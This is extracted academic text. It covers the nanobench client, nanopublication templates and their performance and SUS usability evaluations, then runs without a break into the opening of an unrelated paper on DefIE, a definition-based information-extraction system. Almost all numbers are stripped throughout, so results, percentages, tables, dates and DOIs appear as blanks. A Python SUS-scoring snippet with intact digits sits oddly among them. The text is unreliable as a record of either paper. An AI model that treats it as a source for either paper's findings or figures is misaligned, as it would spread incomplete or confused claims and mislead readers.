nanobench client and templates to demonstrate and evaluate our approach, we next implemented a client application that runs on the user’s local computer, can be accessed through their web browser, and connects to the above decentralized network of services. the code can be found online (https://github.com/peta-pico/nanobench) and fig. shows a screenshot. in the “search” part of the interface, users are provided with a simple search interface that connects to the grlc api operations find_nanopubs_with_uri (if a uri is entered in the search field) or find_nanopubs_with_text (otherwise). in the “others” part, other users’ latest nanopublications can be seen in a feed-like manner, similar to twitter feeds. in order for users to publish their own nanopublications and thereby create their own feed, they have to first set up their profile. nanobench provides close guidance through this process, which involves the declaration of the user’s orcid identifier, the creation of an rsa key pair, and the publication of an introduction nanopublication that links the public key to the orcid identifier. the last step of linking the new introduction nanopublication from the user’s orcid profile is not strictly necessary for the user to start publishing nanopublications and is therefore marked as optional. once the user profile is completed, a list of templates is shown in the “publish” part of the interface. templates are published as nanopublications as well, and so this list can be populated via a call to the find_signed_nanopubs_with_pattern operation of the grlc-based services. currently, the list includes templates for free-text commenting on a url, expressing a foaf:knows relation to another person, declaring that the user has read a given paper, expressing a gene–disease association, retracting a nanopublication, describing a datasets with a sparql endpoint, and publishing an arbitrary rdf triple. figure a screenshot of the nanobench application with a publication form. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/peta-pico/nanobench http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ after selecting a template, a form is automatically generated that allows the user to fill in information according to that template, as shown in fig. . templates describe the kind of statements users can publish and also provide additional information on how the input form should be presented to the user. this is an example of a template (the same one that is shown in fig. ), defined in the assertion graph of a nanopublication: sub:assertion { sub:assertion a nt:assertiontemplate ; rdfs:label "expressing that you know somebody" ; nt:hasstatement sub:st . sub:st a rdf:statement ; rdf:subject nt:creator ; rdf:predicate foaf:knows ; rdf:object sub:person . foaf:knows rdfs:label "know" . sub:person a nt:uriplaceholder ; rdfs:label "orcid identifier of the person you know" ; nt:hasprefix "https://orcid.org/" ; nt:hasregex "[ - ]{ }-[ - ]{ }-[ - ]{ }-[ - ]{ }[ - x]" . } in a template nanopublication, the assertion graph is classified as an assertiontemplate (in the namespace https://w id.org/np/o/ntemplate/) and given a human readable label with rdfs:label. moreover, it is linked to the statement templates (i.e., triples in the nanopublications to be published) via hasstatement. the above example has just one such statement template, but more complex templates involve several of them. 
these templates then use regular rdf reification to point to their subjects, predicates, and objects. in the case of multiple statements, their order in the form can be defined with statementorder and some of them can be marked as optional by classifying them as optionalstatement. rdfs:label can be used on all the elements to define how they should be labeled in the form interface, and the special uri creator is mapped to the identifier of the user applying the template. importantly, the uris in subject, predicate, or object position of the template statements can be declared placeholders with the class uriplaceholder, and similarly for literals with literalplaceholder. such placeholders are represented as input elements, such as text fields or drop-down menus, in the form that is generated from the template. currently supported more specific placeholder types include trustyuriplaceholder, which requires a trusty uri (such as a nanopublication uri), and restrictedchoiceplaceholder, which leads to a drop-down menu with the possible options defined by the property possiblevalue. for uri placeholders, prefixes can be defined with hasprefix and regex restrictions with hasregex, as can be seen in the example above. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://w id.org/np/o/ntemplate/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ once the user filled in a form that was generated from a template and clicks on “publish”, nanobench creates the assertion graph of a new nanopublication by following the template and replacing all the placeholders with the user’s input. for the provenance graph, only a simple prov:wasattributedto link to the user’s identifier is currently added (we are working on extending the coverage of templates to the provenance and publication info graphs). in the publication info graph, nanobench adds a timestamp, specifies the user as the creator of the nanopublication, and adds a wascreatedfromtemplate link that points to the underlying template nanopublication. then, nanobench adds a digital signature element to the publication info graph with a signature made from the user’s local private key, transforms the whole nanopublication into its final state with a trusty uri, and finally publishes it to the server network with a simple http post request. within a few minutes or less, it then appears in the user’s feed. nanobench currently makes use of the redundancy of the nanopublication services in a very simple way: for each query, it randomly selects two grlc service instances and sends the same query to both. it then processes the result as soon as it gets the first answer and discards the second, thereby increasing the chance of success and lowering the average waiting time. more sophisticated versions of this protocol are of course easily imaginable and will be investigated in future work. performance evaluation in order to evaluate our approach, we introduce here a performance evaluation that we ran on the network of nanopublication services. in the next section we will then look into whether these services are useful to potential end users with a usability evaluation on nanobench. performance evaluation design for this performance evaluation we wanted to find out how well the two types of services— ldf-based and grlc-based—perform in our network of services, how they compare, and to what extent they are really complementary. for this purpose, we defined a set of concrete queries that we can then submit to both services. 
we started with the query templates of the grlc-based service, and instantiated each of them with a simple set of parameters to make concrete executable queries. as parameter values, we chose generic yet realistically useful examples that return non-trivial answer sets for the kind of nanopublications that the current templates describe: ( ) find_nanopubs restricted to the month - ; ( ) find_nanopubs_with_pattern with the predicate value set to foaf:knows; ( ) find_nanopubs_with_text on the free-text keyword “john”; ( ) find_nanopubs_with_uri to search for nanopublications mentioning a given orcid identifier; ( – ) of the form find_signed_nanopubs_* are given the same parameters as ( – ); ( ) get_all_indexes and ( ) get_all_users do not need parameters; ( ) get_backlinks and ( ) get_deep_backlinks are given the uri of a specific nanopublication, which has a substantial number of backlinks; ( ) get_latest_version is given the uri of the first version of a template kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nanopublication that has afterwards been updated four times; and ( ) get_nanopub_count is, like ( ), restricted to the month - . we can run these queries via the grlc-powered api but we can also use an ldf engine like comunica to run them against our ldf-based services. the latter comes with some caveats, as the free text queries of find_nanopubs_with_text and find_signed_nanopubs_with_text depend on implementation-dependent non-standard extensions of sparql that do not work with ldf-style query execution. moreover, comunica currently lacks support for complex property paths, which are needed for get_deep_backlinks and get_latest_version. queries ( ), ( ), ( ), and ( ) can therefore only be run on the grlc-based services but not on the ldf-based ones. however, the power of the ldf-based services is of course that they can (potentially) run arbitrary sparql queries (with some restrictions, as mentioned above). to demonstrate and test this ability, we created another query ( ) that in a simple way combines the outputs of two of the currently available templates. specifically, it checks for a given user (below abbreviated as me:) who he has declared to know via the foaf:knows template, and then searches for papers these people declared to have read via a different template. thereby, query ( ) returns a list of all papers that friends of the user me: have read: select ?person ?paper where { me: foaf:knows ?person . ?person pc:hasread ?paper . } this query can be considered a quick-and-dirty solution for exploration purposes, as it misses a number of checks. it does not check that both triples are in the assertion graphs of signed nanopublications, that the first is signed with the public key corresponding to the user in subject position, and that neither of the nanopublications is superseded or retracted. we therefore define query ( ) that includes all these checks. this query is more complicated, and we show here for illustration just the sparql fragment of the part necessary to check that the second nanopublication ?np with public key ?pubkey was not retracted: filter not exists { graph npa:graph { ?retraction npa:hasheadgraph ?rh . ?retraction npa:hasvalidsignatureforpublickey ?pubkey . } graph ?rh { ?retraction np:hasassertion ?ra . } graph ?ra { ?somebody npx:retracts ?np . 
} } the inconvenience of writing such rather complicated queries can be addressed by future versions of the services, which could include predefined options to restrict the query to the assertion graphs and to up-to-date content. the full set of used kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ queries and further details can be found in the supplemental material online (doi . /zenodo. ). to evaluate the performance of the nanopublication services, we accessed them in a clearly defined setting from a number of different locations from personal computers via home networks, by running the queries specified above on all service instances of both kinds. for that, we created a docker image that accesses the grlc-based services with simple http requests via curl and the ldf-based ones with the comunica (https://github.com/comunica/comunica) engine . . . the results as well as the execution time of all the calls are recorded, which is then used to evaluate the performance. for both kinds of services, the timeout is set to s. performance evaluation results we ran the dockerized evaluation process described above at five places in four different countries. each of them ran all of the compatible queries on each of the six existing service instance for both of the two kinds. for each query we therefore have outcomes for grlc and another outcomes for ldf. these outcomes fall into the general categories of timeout, error, and full result. in the case of the ldf-based services, timeout and error outcomes can come with partial results. figure shows a summary of these overall outcomes. with grlc, % of the calls succeeded and only % resulted in an error (mostly due to downtime of one particular service). with ldf, % fully succeeded, % reached the timeout, and % gave an error. the latter two sometimes gave partial results: overall % reached a timeout while still giving partial results, and overall % gave an error with a partial result. for ldf, these types of outcomes are not evenly distributed. two queries— find_nanopubs_with_uri ( ) and get_all_indexes ( )—never fully succeeded, but the former sometimes gave partial results. for the remaining queries, however, these ldf calls returned at least a partial result in % of the cases. except for query ( ) in addition to the above mentioned ( ) and ( ), the full result was always received from at least one of the servers in ldf mode. for grlc, this was the case for all queries. . . . . grlc timeout without result timeout with partial result error without result error with partial result full result _papers_x _papers _get_nanopub_count _get_latest_version _get_deep_backlinks _get_backlinks _get_all_users _get_all_indexes _find_signed_nanopubs_with_uri _find_signed_nanopubs_with_text _find_signed_nanopubs_with_pattern _find_signed_nanopubs _find_nanopubs_with_uri _find_nanopubs_with_text _find_nanopubs_with_pattern _find_nanopubs . . . . ldf ratio of query executions figure overall outcomes per query and kind of service, executed from five locations. full-size doi: . /peerj-cs. /fig- kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://doi.org/ . /zenodo. https://github.com/comunica/comunica http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a client checking multiple servers would therefore have eventually received the full result. 
for query ( ) in ldf mode, this was true for cases out of . next, we can look at the time performance. table shows the average execution times per query and service type, including only the calls that returned a full result. the successful queries to the grlc services took on average from . to . s. for the ldf services, these numbers range from . to . s (but they can be a bit misleading as they ignore the fact that the ldf services repeatedly hit the time limit of s). for the queries that could successfully be run on both kinds of services, ldf is on average . to . times slower than grlc. importantly, the queries that do not follow a predefined pattern ( ) and ( ) gave the full result with ldf in % of the cases and ran reasonably fast. the quick-and-dirty version ( ) required on average . s, whereas the thorough one ( ) completed on average after . s. usability evaluation now that we know that the services perform reasonably well, we wanted to find out whether this general approach and our specific nanobench tool indeed makes it easy for users who might not be experts in linked data to publish their own small data entries. usability evaluation design we wanted to test the usability of nanobench in a real setting, where users actually publish nanopublications. for that we wrote detailed instructions on how to install and use nanobench and its publication feature, which includes downloading the latest nanobench release, running it locally, accessing nanobench through their web browser, completing the nanobench profile, accessing the list of templates, and finally filling in and submitting table average execution times of the successful query executions in seconds. query grlc ldf l/g find_nanopubs . . . find_nanopubs_with_pattern . . . find_nanopubs_with_text . find_nanopubs_with_uri . find_signed_nanopubs . . . find_signed_nanopubs_with_pattern . . . find_signed_nanopubs_with_text . find_signed_nanopubs_with_uri . . . get_all_indexes . get_all_users . . . get_backlinks . . . get_deep_backlinks . get_latest_version . get_nanopub_count . . . papers . papers_x . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the publication form generated from a chosen template. through mailing lists, social media, and personal contacts, we tried to convince as many people as possible to try out nanobench and to publish some nanopublications on their own. next, we created an anonymous usability questionnaire, consisting of the ten standard questions of the widely used system usability scale (sus) (brooke, ). we added to that the questions “have you published rdf/linked data before?” and “have you digitally signed rdf/linked data before?”, and as a follow up to each of them—if the answer was “yes”—whether nanobench was harder or easier to use for publishing and signing linked data, respectively, compared to how they previously did it. the responses were on a -point likert scale from (nanobench was harder) to (nanobench was easier). we sent this questionnaire to all the nanobench users who published at least one nanopublication (not counting their introduction nanopublication), excluding the co-authors of this paper and their close relatives. further details, including instructions and questionnaire, can be found in the supplemental material online (doi . /zenodo. ). usability evaluation results overall, users registered in the decentralized system by publishing an introduction nanopublication. 
a total of of them ( %) also linked this introduction nanopublication from their orcid accounts, which was a step that was marked as optional. collectively, they published nanopublications, not counting their introduction nanopublications, via the use of seven distinct templates. after applying the exclusion criteria defined above, we arrived at a set of users to whom we sent the anonymous usability questionnaire (this set of users is overlapping but different from the set of users mentioned just above). after sending up to two reminders, we received responses from all of them. on the question of whether they had published linked data before, respondents ( %) said they had. of them ( %) reported that nanobench was easier to use compared to how they previously published linked data, with the remaining one being indifferent (score of ). the average was . on the -point likert scale. of the respondents, only three ( %) stated that they had previously digitally signed linked data. all three of them found nanobench easier, giving two times a and once a as responses (average . ). table shows the results of the sus questions. overall, our system achieved a sus score of . , which is clearly above the average score reported in the literature ( . ) and is roughly in the middle between "good" and "excellent" on an adjective scale (bangor, kortum & miller, ). interestingly, if we only consider the eight respondents who stated they had never published linked data before, this value is even better at . , clearly in the "excellent" range.

table : sus usability evaluation results (scores per question, grouped into odd and even questions):
: i think that i would like to use this system frequently ( . )
: i found the system unnecessarily complex ( . )
: i thought the system was easy to use ( . )
: i think that i would need the support of a technical person to be able to use this system ( . )
: i found the various functions in this system were well integrated ( . )
: i thought there was too much inconsistency in this system ( . )
: i would imagine that most people would learn to use this system very quickly ( . )
: i found the system very cumbersome to use ( . )
: i felt very confident using the system ( . )
: i needed to learn a lot of things before i could get going with this system ( . )
total: .

the participants were moreover given the possibility to provide further feedback in a free-text field. we received a variety of comments for further improvement, but except for the point that the required local installation was somewhat inconvenient, no point was mentioned more than once. the other comments concerned the search page being confusing (this part of the interface was indeed not the focus of the study), the lack of support for batch publishing of multiple similar nanopublications, the lack of integrated orcid lookup, the relatively small number of general-purpose templates, the lack of rdf prefix recognition, the fact that not all lengthy uris are masked with readable labels in the user interface, and the fact that the confirmation checkbox did not mention the possibility of retraction. a further comment was that a command-line interface would have been preferred in the particular context of the given participant. such a command-line interface actually exists (as part of the nanopub-java library; kuhn, ) but was not the focus of this study.

discussion and conclusion

the results of the performance study described above confirm that the tested kinds of queries can be efficiently answered by at least one of the two types of services, and that these two service types are indeed complementary. the grlc services run reliably and fast on the types of queries they are designed for. the ldf services can run most of these kinds of queries too, albeit in a much slower fashion, and they are reasonably fast for simple kinds of unrestricted queries. the results of the usability study indicate that our nanobench client application connecting to these services is indeed easily and efficiently usable, even for users with no prior experience in linked data publishing.
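for reference, the sus score reported in the usability results above follows the standard scoring scheme for the ten-item questionnaire: odd items contribute the response minus one, even items contribute five minus the response, and the raw sum is scaled by 2.5; a minimal python sketch with made-up responses:

def sus_score(responses):
    """compute the system usability scale score from ten 1-5 likert responses.
    odd-numbered items are positively worded, even-numbered items negatively worded."""
    if len(responses) != 10 or not all(1 <= r <= 5 for r in responses):
        raise ValueError("sus expects exactly ten responses in the range 1-5")
    total = 0
    for i, r in enumerate(responses, start=1):
        total += (r - 1) if i % 2 == 1 else (5 - r)
    return total * 2.5  # maps the 0-40 raw sum onto a 0-100 scale

# made-up example: one respondent's answers to items 1..10
print(sus_score([5, 1, 4, 2, 5, 1, 5, 2, 4, 1]))  # -> 90.0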
in future work, we are planning to improve a number of aspects of the involved tools and methods. for example, our approach does not yet exploit the full potential of replication in our decentralized setting. existing work has shown that a client-side algorithm can enable effective load-balancing over tpf servers (minier et al., ), and we plan to extend this work to qpf. as another example, our otherwise decentralized approach currently uses centralized orcid identifiers. we are therefore investigating decentralized forms of authentication, such as webid-oidc (https://github.com/solid/webid-oidc-spec) or an approach similar to the web of trust (caronni, ), where public keys are found based on personal trust relationships that could themselves be published as nanopublications. such a web of trust could then also allow users in the future to find trustworthy services. this could include meta services whose task is to monitor and test other kinds of services, so clients could make an informed decision on which service instances to rely on. this is currently difficult, as there is no guarantee that all services are well-behaved and return complete and correct results. clients could already now deal with this by taking random samples of nanopublications from the publishing servers and checking whether the query services correctly return them, but this is quite resource intensive.

another issue that needs to be taken care of in future work is identity management when private keys are compromised, lost, or simply replaced as a measure of precaution. for that, we envisage that introduction nanopublications are extended so users can also list old public keys. on top of that, we are going to need a method for users to re-claim old nanopublications they signed with an old key that has since been compromised by a third party (possibly by linking to them with an index nanopublication signed with a new key). this will also require modifications in how we deal with retracted and superseded nanopublications, as they might then be signed with a different key. this is not trivial but can be dealt with within our framework, as opposed to blockchain-based solutions where identity is inseparably linked to private key access.
currently, users need to install nanobench locally to ensure secure private key access and proper decentralization, but a more flexible and more powerful handling of private keys as explained above will also allow us to provide login-based public nanobench instances with their own sets of private keys, which in turn can significantly increase the ease of use of our approach. more work is also needed on the templating features to also cover the provenance and publication info graphs. we also plan to more closely align our templating vocabulary with existing rdf shape standards. moreover, we are working on making our templating approach more general and more powerful, by adding repeatable statement patterns among other features, such that we can express, for example, templates of templates and thereby allow users to create and publish their own templates directly via nanobench.

the tools and applications we described above in a sense just scratch the surface of what can become possible with our general approach in the nearer future, from linked data publications of the latest scientific findings, to formally organized argumentation and automated real-time aggregations. we believe that our approach of semantic micro-contributions could in fact be the starting point of bringing linked data publishing to the masses.

additional information and declarations

funding
ruben taelman is a postdoctoral fellow of the research foundation - flanders (fwo) ( n). support for vincent emonet and michel dumontier was provided by the biomedical data translator project funded by national institutes of health (no. ot tr - ). stian soiland-reyes was funded by bioexcel- (european commission h -infraedi- - - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: research foundation - flanders (fwo): n. national institutes of health: ot tr - . bioexcel- (european commission): h -infraedi- - - .

competing interests
haris antonatos is employed by scify. the authors declare that they have no competing interests.

author contributions
- tobias kuhn conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- ruben taelman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- vincent emonet performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- haris antonatos performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- stian soiland-reyes performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
- michel dumontier performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability:
supplemental data for the performance evaluation is available at zenodo: tobias kuhn, & vincent emonet. ( , august ). peta-pico/nanopub-services-eval . (version . ). zenodo. doi . /zenodo. .
supplemental data for the usability evaluation is available at zenodo: tobias kuhn. ( , august ).
peta-pico/nanobench-usability-eval . (version . ). zenodo. doi . /zenodo. .
the code for nanobench (release nanobench- . ) is available at zenodo: tobias kuhn, & vincent emonet. ( , november ). peta-pico/nanobench: nanobench- . (version nanobench- . ). zenodo. doi . /zenodo. .
the code for the nanopublication services (release nanopub-services- . ) is also available at zenodo: tobias kuhn. ( , november ). peta-pico/nanopub-services: nanopub-services- . (version nanopub-services- . ). zenodo. doi . /zenodo. .

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
auer s, bizer c, kobilarov g, lehmann j, cyganiak r, ives z. . dbpedia: a nucleus for a web of open data. in: the semantic web. springer doi . / - - - - _ .
bangor a, kortum pt, miller jt. . an empirical evaluation of the system usability scale. international journal of human-computer interaction ( ): – doi . / .
baumeister j, reutelshoefer j, puppe f. . knowwe: a semantic wiki for knowledge engineering. applied intelligence ( ): – doi . /s - - - .
berners-lee t. . linked data. available at https://www.w .org/designissues/linkeddata.html.
bizer c, heath t, berners-lee t. . linked data: the story so far. in: semantic services, interoperability and web applications: emerging concepts. igi global doi . / - - - - .ch .
brooke j. . sus: a quick and dirty usability scale. in: jordan pw, thomas b, weerdmeester ba, mcclelland il, eds. usability evaluation in industry. milton park: taylor & francis, – .
buil-aranda c, hogan a, umbrich j, vandenbussche p-y. . sparql web-querying infrastructure: ready for action? in: the semantic web–iswc . springer doi . / - - - - _ .
buyle r, taelman r, mostaert k, joris g, mannens e, verborgh r, berners-lee t. . streamlining governmental processes by putting citizens in control of their personal data. in: international conference on electronic governance and open society: challenges in eurasia. springer, – doi . / - - - - _ .
caronni g. . walking the web of trust. in: wet ice . piscataway: ieee doi . /enabl. . .
delva h, rojas melendez ja, colpaert p, verborgh r. . decentralized publication and consumption of transfer footpaths. first international workshop on semantics for transport : – .
feigenbaum l, todd williams g, grant clark k, torres e. . sparql . protocol. rec., w c. available at https://www.w .org/tr/ /recsparql -protocol- /.
ghidini c, kump b, lindstaedt s, mahbub n, pammer v, rospocher m, serafini l. . moki: the enterprise modelling wiki. in: european semantic web conference. springer, – doi . / - - - - _ .
guha rv, brickley d, macbeth s. . schema.org: evolution of structured data on the web. communications of the acm ( ): – doi . / .
kuhn t. . acewiki: a natural and expressive semantic wiki. in: proceedings of semantic web user interaction at chi : exploring hci challenges. ceur workshop proceedings.
kuhn t. . nanopub-java: a java library for nanopublications. in: linked science: proceedings of the th workshop on linked science - best practices and the road ahead (lisc ). vol. . ceur workshop proceedings, – .
kuhn t, barbano pe, nagy ml, krauthammer m. . broadening the scope of nanopublications. in: extended semantic web conference. springer doi . / - - - - _ .
kuhn t, chichester c, krauthammer m, queralt-rosinach n, verborgh r, giannakopoulos g, ngomo a-cn, viglianti r, dumontier m. . decentralized provenance-aware publishing with nanopublications. peerj computer science ( ):e doi . /peerj-cs. .
kuhn t, dumontier m. . making digital artifacts on the web verifiable and reliable. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . .
kuhn t, dumontier m. . genuine semantic publishing. data science ( – ): – doi . /ds- .
kuhn t, willighagen e, evelo c, queralt-rosinach n, centeno e, furlong li. . reliable granular references to changing linked data. in: international semantic web conference. springer doi . / - - - - _ .
lanthaler m, gütl c. . hydra: a vocabulary for hypermedia-driven web apis. in: ldow . rio de janeiro, brazil.
lisena p, meroño-peñuela a, kuhn t, troncy r. . easy web api development with sparql transformer. in: international semantic web conference. cham: springer doi . / - - - - _ .
mansour e, sambra av, hawke s, zereba m, capadisli s, ghanem a, aboulnaga a, berners-lee t. . a demonstration of the solid platform for social web applications. in: th international conference companion on world wide web. montréal, québec, canada, – doi . / . .
meroño-peñuela a, hoekstra r. . grlc makes github taste like linked data apis. in: european semantic web conference. springer doi . / - - - - _ .
minier t, skaf-molli h, molli p, vidal m-e. . intelligent clients for replicated triple pattern fragments. in: european semantic web conference. cham: springer doi . / - - - - _ .
mons b, van haagen h, chichester c, den dunnen jt, van ommen g, van mulligen e, singh b, hooft r, roos m, hammond j, kiesel b, giardine b, velterop j, groth p, schultes e. . the value of data. nature genetics ( ): – doi . /ng - .
schmachtenberg m, bizer c, paulheim h. . adoption of the linked data best practices in different topical domains. in: international semantic web conference. cham: springer, – doi . / - - - - _ .
shotton d. . semantic publishing: the coming revolution in scientific journal publishing. learned publishing ( ): – doi . / .
speicher s, arwe j, malhotra a. . linked data platform . . w c recommendation. available at https://www.w .org/tr/ldp/ (accessed february ).
taelman r, steyskal s, kirrane s. . towards querying in decentralized environments with privacy-preserving aggregation. in: proceedings of the th workshop on storing, querying, and benchmarking the web of data.
taelman r, van herwegen j, vander sande m, verborgh r. . comunica: a modular sparql query engine for the web. in: th international semantic web conference doi . / - - - - _ .
third a, domingue j. . linkchains: exploring the space of decentralised trustworthy linked data. in: workshop on decentralizing the semantic web . ceur-ws.
verborgh r, vander sande m, hartig o, van herwegen j, de vocht l, de meester b, haesendonck g, colpaert p. . triple pattern fragments: a low-cost knowledge graph interface for the web. journal of web semantics - : – doi . /j.websem. . . .
vrandečić d, krötzsch m. . wikidata: a free collaborative knowledgebase. communications of the acm ( ): – doi . / .
werbrouck j, taelman r, verborgh r, pauwels p, beetz j, mannens e. . pattern-based access control in a decentralised collaboration environment. in: proceedings of the th linked data in architecture and construction workshop. ceur-ws.
large-scale information extraction from textual definitions through deep syntactic and semantic analysis

claudio delli bovi, luca telesca and roberto navigli
department of computer science, sapienza university of rome
{dellibovi,navigli}@di.uniroma .it, luca.telesca@gmail.com

abstract

we present defie (http://lcl.uniroma .it/defie), an approach to large-scale information extraction (ie) based on a syntactic-semantic analysis of textual definitions. given a large corpus of definitions we leverage syntactic dependencies to reduce data sparsity, then disambiguate the arguments and content words of the relation strings, and finally exploit the resulting information to organize the acquired relations hierarchically. the output of defie is a high-quality knowledge base consisting of several million automatically acquired semantic relations.

introduction

the problem of knowledge acquisition lies at the core of natural language processing. recent years have witnessed the massive exploitation of collaborative, semi-structured information as the ideal middle ground between high-quality, fully-structured resources and the larger amount of cheaper (but noisy) unstructured text (hovy et al., ). collaborative projects, like freebase (bollacker et al., ) and wikidata (vrandečić, ), have been under development for many years and are continuously being improved. a great deal of research also focuses on enriching available semi-structured resources, most notably wikipedia, thereby creating taxonomies (ponzetto and strube, ; flati et al., ), ontologies (mahdisoltani et al., ) and semantic networks (navigli and ponzetto, ; nastase and strube, ). these solutions, however, are inherently constrained to small and often pre-specified sets of relations. a more radical approach is adopted in systems like textrunner (etzioni et al., ) and reverb (fader et al., ), which developed from the open information extraction (oie) paradigm (etzioni et al., ) and focused on the unconstrained extraction of a large number of relations from massive unstructured corpora. ultimately, all these endeavors were geared towards addressing the knowledge acquisition problem and tackling long-standing challenges in the field, such as machine reading (mitchell, ).

while earlier oie approaches relied mostly on dependencies at the level of surface text (etzioni et al., ; fader et al., ), more recent work has focused on deeper language understanding at the level of both syntax and semantics (nakashole et al., ; moro and navigli, ) and tackled challenging linguistic phenomena like synonymy and polysemy. however, these issues have not yet been addressed in their entirety.
relation strings are still bound to surface text, lacking actual semantic content. furthermore, most oie systems do not have a clear and unified ontological structure and require additional processing steps, such as statistical inference mappings (dutta et al., ), graph-based alignments of relational phrases (grycner and weikum, ), or knowledge base unification procedures (delli bovi et al., ), in order for their potential to be exploitable in real applications.

in defie the key idea is to leverage the linguistic analysis of recent semantically-enhanced oie techniques while moving from open text to smaller corpora of dense prescriptive knowledge. the aim is then to extract as much information as possible by unifying syntactic analysis and state-of-the-art disambiguation and entity linking. using this strategy, from an input corpus of textual definitions (short and concise descriptions of a given concept or entity) we are able to harvest fully disambiguated relation instances on a large scale, and integrate them automatically into a high-quality taxonomy of semantic relations. as a result, a large knowledge base is produced that shows competitive accuracy and coverage against state-of-the-art oie systems based on much larger corpora. our contributions can be summarized as follows:

- we propose an approach to ie that ties together syntactic dependencies and unified entity linking/word sense disambiguation, designed to discover semantic relations from a relatively small corpus of textual definitions;
- we create a large knowledge base of fully disambiguated relation instances, ranging over named entities and concepts from available resources like wordnet and wikipedia;
- we exploit our semantified relation patterns to automatically build a rich, high-quality relation taxonomy, showing competitive results against state-of-the-art approaches.

our approach comprises three stages. first, we extract from our input corpus an initial set of semantic relations (section ); each relation is then scored and augmented with semantic type signatures (section ); finally, the augmented relations are used to build a relation taxonomy (section ).

relation extraction

here we describe the first stage of our approach, where a set of semantic relations is extracted from the input corpus. in the following, we refer to a relation instance as a triple t = 〈ai, r, aj〉, with ai and aj being the arguments and r the relation pattern. for each relation pattern rk, the associated relation is identified by the set of all relation instances whose pattern equals rk. in order to extract a large set of fully disambiguated relation instances we bring together syntactic and semantic analysis on a corpus of plain textual definitions. each definition is first parsed and disambiguated (figure a-b, section . ); syntactic and semantic information is combined into a structured graph representation (figure c, section . ) and relation patterns are then extracted as shortest paths between concept pairs (section . ).

figure : syntactic-semantic graph construction from a textual definition.
the semantics of our relations draws on babelnet (navigli and ponzetto, ), a wide-coverage mul- tilingual semantic network obtained from the auto- matic integration of wordnet, wikipedia and other resources. this choice is not mandatory; however, inasmuch as it is a superset of these resources, ba- belnet brings together lexicographic and encyclope- dic knowledge, enabling us to reach higher coverage while still being able to accommodate different dis- ambiguation strategies. for each relation instance t extracted, both ai,aj and the content words appear- ing in r are linked to the babelnet inventory. in the remainder of the paper we identify babelnet con- cepts or entities using a subscript-superscript nota- tion where, for instance, bandibn refers to the i-th babelnet sense for the english word band. . textual definition processing the first step of the process is the automatic extraction of syntactic information (typed depen- dencies) and semantic information (word senses and named entity mentions) from each textual definition. each definition undergoes the following steps: syntactic analysis. each textual defini- tion d is parsed to obtain a dependency graph gd (figure a). parsing is carried out using c&c (clark and curran, ), a log-linear parser based on combinatory categorial grammar (ccg). although our algorithm seamlessly works with any syntactic formalism, ccg rules are especially suited to longer definitions and linguistic phenomena like coordinating conjunctions (steedman, ). semantic analysis. semantic analysis is based on babelfy (moro et al., ), a joint, state- of-the-art approach to entity linking and word sense disambiguation. given a lexicalized semantic net- work as underlying structure, babelfy uses a dense subgraph algorithm to identify high-coherence semantic interpretations of words and multi-word expressions across an input text. we apply babelfy to each definition d, obtaining a sense mapping sd from surface text (words and entity mentions) to word senses and named entities (figure b). as a matter of fact, any disambiguation or entity linking strategy can be used at this stage. however, a knowledge-based unified approach like babelfy is best suited to our setting, where context is limited and exploiting definitional knowledge as much as possible is key to attaining high-coverage results (as we show in section . ). . syntactic-semantic graph construction the information extracted by parsing and dis- ambiguating a given definition d is unified into a syntactic-semantic graph gsemd where concepts and entities identified in d are arranged in a graph struc- ture encoding their syntactic dependencies (figure c). we start from the dependency graph gd, as provided by the syntactic analysis of d in section . . semantic information from the sense mappings sd can be incorporated directly in the vertices of gd by attaching available matches between words and senses to the corresponding vertices. dependency graphs, however, encode dependencies solely on a word basis, while our sense mappings may include multi-word expressions (e.g. pink floyd bn). in order to extract consistent information, subsets of vertices referring to the same concept or entity are merged to a single semantic node, which replaces the subgraph covered in the original dependency structure. consider the example in figure : an entity like pink floyd bn covers two distinct and connected vertices in the dependency graph gd, one for the noun floyd and one for its modifier pink. 
in the actual semantics of the sentence, as encoded in gsemd (figure c), these two vertices are merged to a single node referring to the entity pink floyd bn (the english rock band), instead of being assigned individual word interpretations. our procedure for building gsemd takes as input a typed dependency graph gd and a sense mapping sd, both extracted from a given definition d. gsemd is first populated with the vertices of gd referring to disambiguated content words, merging those vertices covered by the same sense s ∈ sd into a single node (like pink floyd bn and atom heart mother bn in figure c). then, the remaining vertices and edges are added as in gd, discarding non-disambiguated adjuncts and modifiers (like the and fifth in figure ).

. relation pattern identification

at this stage, all the information in a given definition d has been extracted and encoded in the corresponding graph gsemd (section . ). we now consider those paths connecting entity pairs across the graph and extract the relation pattern r between two entities and/or concepts as the shortest path between the two corresponding vertices in gsemd. this enables us to exclude less relevant information (typically carried by adjuncts or modifiers) and reduce data sparsity in the overall extraction process.

